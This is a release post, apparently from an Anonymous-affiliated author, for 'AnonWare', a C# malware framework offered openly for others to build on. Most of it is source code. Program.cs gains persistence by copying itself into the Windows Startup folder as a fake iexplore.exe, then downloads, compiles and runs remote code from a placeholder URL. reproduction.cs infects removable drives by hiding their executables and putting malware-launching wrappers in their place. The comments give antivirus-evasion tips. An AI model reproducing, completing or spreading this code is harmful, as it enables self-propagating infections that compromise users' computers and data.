AnonWare 1.0 RELEASE: http://pastebin.com/5f4C79VA UPDATE: GITHUB REPO AVAILABLE NOW! https://github.com/opendeveloper/anonware (^)_(^) TO SET THE RECORD STRAIGHT: as for allegations that my code is 'amaturish, lazy, etc.' i would like to say that it's completely true :) the code provided here *IS* just a C# compiler (with a little extra) and shouldn't be taken as some kind of super awesome virus released by a group of Anonymous hackers. it's something me, a bad programmer, threw together in a couple hours and decided to paste on pastebin. oh, and fortherecord, i was a little high, and, retrospectively, the comments were definitely over-optimistic. and when the reporter from the tech herald contacted me, i assumed that he was a developer, and he took interest in the code. i naturally was like, well i guess it is pretty cool...and let my ego get ahead of myself. i would like to formally apologize to fellow Anonymous members for providing such a simple framework and then acting inapropriately like it was an awesome new idea. as for encryption/obfuscation encryption/obfuscation was something i was assuming the devs could add to the framework; i didn't think it would be something i should put in the framework. besides; if i put a specific kind of obfuscation/encryption into the framework as it was, it would be pretty easy for the a/v vendors to just find a flaw in one part of my encryption code and then use that to exploit all future editions of it. that doesn't allign well with what the 'framework' is, more of like the standard stuff so you can add on your own stuff so that a/v doesn't have one standard thing to go off. UPDATE: we now have encryption ^_^ check out our github repo for more info as for existing malware frameworks once again, alittle high, way to optimistic comments ^^_^^ as for the existing malware frameworks pointed out, all of them are either pay-to-use or really hard to find the source for. i provided AnonWare as a service that's simple to find and easy to modify for the future: i will release the FIRST version of AnonWare a couple days after #RefRef is released. hopefully, it will include encryption/obfuscation, a seperate edition for people that want to create rouge AV and other software. i have an idea for using it with #RefRef, and will get everything ready for integration with #RefRef while we wait for the #RefRef team to complete development. i emphasize FIRST because it seems some people misunderstood the point of AnonWare...it was counterintuitive for the Sophos researcher to provide malware detection for it since what is provided here is nowhere near completed malware. also the tech hareld reporter may have misunderstood, partially by sending the code to the researches. i'm not blaming anyone for this; i acted like it was bigger than it was, and as a result reporters and the public may have been dissapointed when reading thru the code. finally, please help AnonWare :P if you can do any type of development, i would love it if you could help improve the code, translate the code, etc. ty. tyvm. NOW BACK TO THE REST OF THE PASTE! note - keep in mind that this is nowhere near a completed virus, just sumthing i threw together in a day ^_^ if you would like to use this at all, you're gonna need to add a lot to the code...it's just the absolute simplest parts of malware ///(update: no longer accepting code improvements :( will post updated code when i create it) ///(update#2: nvrm, gonna post it on github and let ppl play arnd with it) ///kthx Program.cs contents: using System; using System.Collections.Generic; using System.Linq; using System.Text; using Microsoft.CSharp; using System.Diagnostics; using System.Runtime.InteropServices; using System.Management; using System.Threading; using System.CodeDom.Compiler; using System.Net; using System.IO; namespace AnonWare_CSharp { class Program { static void Main() { string appdatapath = Environment.GetEnvironmentVariable("appdata").ToString(); //when it starts, app checks whether or not it's set to run on startup if (File.Exists(appdatapath + @"\Microsoft\Windows\Start Menu\Programs\Startup\iexplore.exe")) //we're using iexplore.exe as our fake identity :P check in Properties -> assembly name 2 change it. keep in mind that XP might have a different startup folder than then Win 7 and Vista. this is the path for 7 and vista startup folder { } else { //if it isn't, do this File.Copy(AppDomain.CurrentDomain.FriendlyName.ToString(), appdatapath + @"\Microsoft\Windows\Start Menu\Programs\Startup\iexplore.exe"); } } public static string watsdasource; static void compile() { //we're using runtime compilation instead of just downloading an exe to go around the whole program is not signed by msft shit try { CSharpCodeProvider myCodeProvider = new CSharpCodeProvider(); ICodeCompiler myCodeCompiler = myCodeProvider.CreateCompiler(); String[] referenceAssemblies = { "System.dll" }; //if you plan to do more than really simple stuff with it, add stuff to this list (seperate them with commas) string myAssemblyName = "assemble.exe"; CompilerParameters myCompilerParameters = new CompilerParameters(referenceAssemblies, myAssemblyName); myCompilerParameters.GenerateExecutable = true; myCompilerParameters.GenerateInMemory = true; WebClient x = new WebClient(); Stream y = x.OpenRead("http://sumsite.com/sumfile.txt"); //link to txt file containing source code (nothing matters except that it's a text file, name it anything you want) StreamReader z = new StreamReader(y); string source = z.ReadToEnd(); if (source != watsdasource) { watsdasource = source; z.Close(); y.Close(); CompilerResults compres = myCodeCompiler.CompileAssemblyFromSource(myCompilerParameters, source); Process.Start("assemble.exe"); //for AV purposes, it's recommended that you change the name of this, or even make the name self-creating (see 'for all your randomness needs' below) ^_^ } else { z.Close(); y.Close(); } } catch { //uh oh... } } //for all your randomness needs! ^_^ public static string GetPassword() { StringBuilder builder = new StringBuilder(); builder.Append(RandomString(4, true)); builder.Append(RandomNumber(1000, 9999)); builder.Append(RandomString(2, false)); return builder.ToString(); } private static int RandomNumber(int min, int max) { Random random = new Random(); return random.Next(min, max); } private static string RandomString(int size, bool lowerCase) { StringBuilder builder = new StringBuilder(); Random random = new Random(); char ch; for (int i = 0; i < size; i++) { ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65))); builder.Append(ch); } if (lowerCase) return builder.ToString().ToLower(); return builder.ToString(); } } } reproduction.cs contents: ///reproduction.cs contains some nice, but still not near finished, code that turns AnonWare into a virus ^_^ ///check thru psuedocode for more info :P ///TODO: ///intercept exe files before they're uploaded, compressed, or downloaded. ///instead of using a fake directory, actually copy the exe into the new wrapper ^^_^^ ///spread thru la world! using System; using System.Collections.Generic; using System.Linq; using System.Text; using Microsoft.CSharp; using System.Diagnostics; using System.Runtime.InteropServices; using System.Management; using System.Threading; using System.CodeDom.Compiler; using System.Net; using System.IO; namespace AnonWare_CSharp { class reproduction { public void reproduce() { Properties.Settings.Default.filename = GetPassword() + ".exe"; Properties.Settings.Default.Save(); string fname = Properties.Settings.Default.filename; File.Copy(AppDomain.CurrentDomain.FriendlyName.ToString(), Properties.Settings.Default.filename); } public void usbinject() { /// ///foreach [program] x in [directory] y ///{ ///MOVE PROGRAMS INTO GetPassword including the CHILD ///CREATE COMPILER ///string source = "yadayda" + GetPassword\filename.exe + "moaryada" + GetPassword\Settings.Default.filename + "even MOAR yadyada"; ///COMPILE & PLACE IN PLACE OF ORIGINAL EXE ///} /// //this could really be improved... if(Directory.Exists(@"F:\")) { if (GetDirectorySize(@"F:\") < 20000000.00 & GetDirectorySize(@"F:\") != 0) //i *think* that means 20 MB... it would really sux if it meant 20 GB or 20 KB xD { INJECT(@"F:\"); } } if (Directory.Exists(@"G:\")) { if (GetDirectorySize(@"G:\") < 20000000.00 & GetDirectorySize(@"G:\") != 0) { INJECT(@"G:\"); } } if (Directory.Exists(@"H:\")) { if (GetDirectorySize(@"H:\") < 20000000.00 & GetDirectorySize(@"H:\") != 0) { INJECT(@"H:\"); } } if (Directory.Exists(@"I:\")) { if (GetDirectorySize(@"I:\") < 20000000.00 & GetDirectorySize(@"I:\") != 0) { INJECT(@"I:\"); } } if (Directory.Exists(@"J:\")) { if (GetDirectorySize(@"J:\") < 20000000.00 & GetDirectorySize(@"J:\") != 0) { INJECT(@"J:\"); } } if (Directory.Exists(@"Z:\")) { if (GetDirectorySize(@"Z:\") < 20000000.00 & GetDirectorySize(@"Z:\") != 0) { INJECT(@"Z:\"); } } if (Directory.Exists(@"D:\")) { if (GetDirectorySize(@"D:\") < 20000000.00 & GetDirectorySize(@"D:\") != 0) { INJECT(@"D:\"); } } } private void INJECT(string directorytoinject) { try { string[] directorys = Directory.GetDirectories(directorytoinject); foreach (string dr in directorys) { if (File.Exists(dr + "info.aw")) { //It's ALIVE! } } string[] a = Directory.GetFiles(directorytoinject, "*.exe"); string direct = directorytoinject + GetPassword(); Directory.CreateDirectory(direct); string[] new1 = Properties.Settings.Default.filename.Split('.'); string de1 = direct + @"\" + new1[0] + "anonwr.exe"; File.Copy(Properties.Settings.Default.filename, de1); File.Copy(Properties.Settings.Default.filename, direct + @"\" + Properties.Settings.Default.filename); foreach (string nm in a) { string newName = GetPassword() + ".exe"; string Direct = direct + @"\" + newName; File.Move(nm, Direct); CSharpCodeProvider myCodeProvider = new CSharpCodeProvider(); ICodeCompiler myCodeCompiler = myCodeProvider.CreateCompiler(); String[] referenceAssemblies = { "System.dll" }; string myAssemblyName = nm; CompilerParameters myCompilerParameters = new CompilerParameters(referenceAssemblies, myAssemblyName); myCompilerParameters.GenerateExecutable = true; myCompilerParameters.GenerateInMemory = false; string direct2 = direct + "\\" + Properties.Settings.Default.filename; string source = "using System; using System.Diagnostics; namespace anonwarebooter { class Program { static void Main(string[] args) { try { Process cmd = new Process(); string ags = \"/C " + Direct.Replace("\\", "\\\\") + "\"; cmd.StartInfo.FileName = \"cmd\"; cmd.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; cmd.StartInfo.Arguments = ags; cmd.Start(); Process cmd2 = new Process(); string ags2 = \"/C " + de1.Replace("\\", "\\\\") + "\"; cmd2.StartInfo.FileName = \"cmd\"; cmd2.StartInfo.Arguments = ags2; cmd2.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; cmd2.Start(); } catch { } } } }"; CompilerResults compres = myCodeCompiler.CompileAssemblyFromSource(myCompilerParameters, source); } } catch { } } static long GetDirectorySize(string p) { // 1 // Get array of all file names. string[] a = Directory.GetFiles(p, "*.exe"); // 2 // Calculate total bytes of all files in a loop. long b = 0; foreach (string name in a) { // 3 // Use FileInfo to get length of each file. FileInfo info = new FileInfo(name); b += info.Length; } // 4 // Return total size return b; } public string GetPassword() { StringBuilder builder = new StringBuilder(); builder.Append(RandomString(4, true)); builder.Append(RandomNumber(1000, 9999)); builder.Append(RandomString(2, false)); return builder.ToString(); } private int RandomNumber(int min, int max) { Random random = new Random(); return random.Next(min, max); } private string RandomString(int size, bool lowerCase) { StringBuilder builder = new StringBuilder(); Random random = new Random(); char ch; for (int i = 0; i < size; i++) { ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65))); builder.Append(ch); } if (lowerCase) return builder.ToString().ToLower(); return builder.ToString(); } } }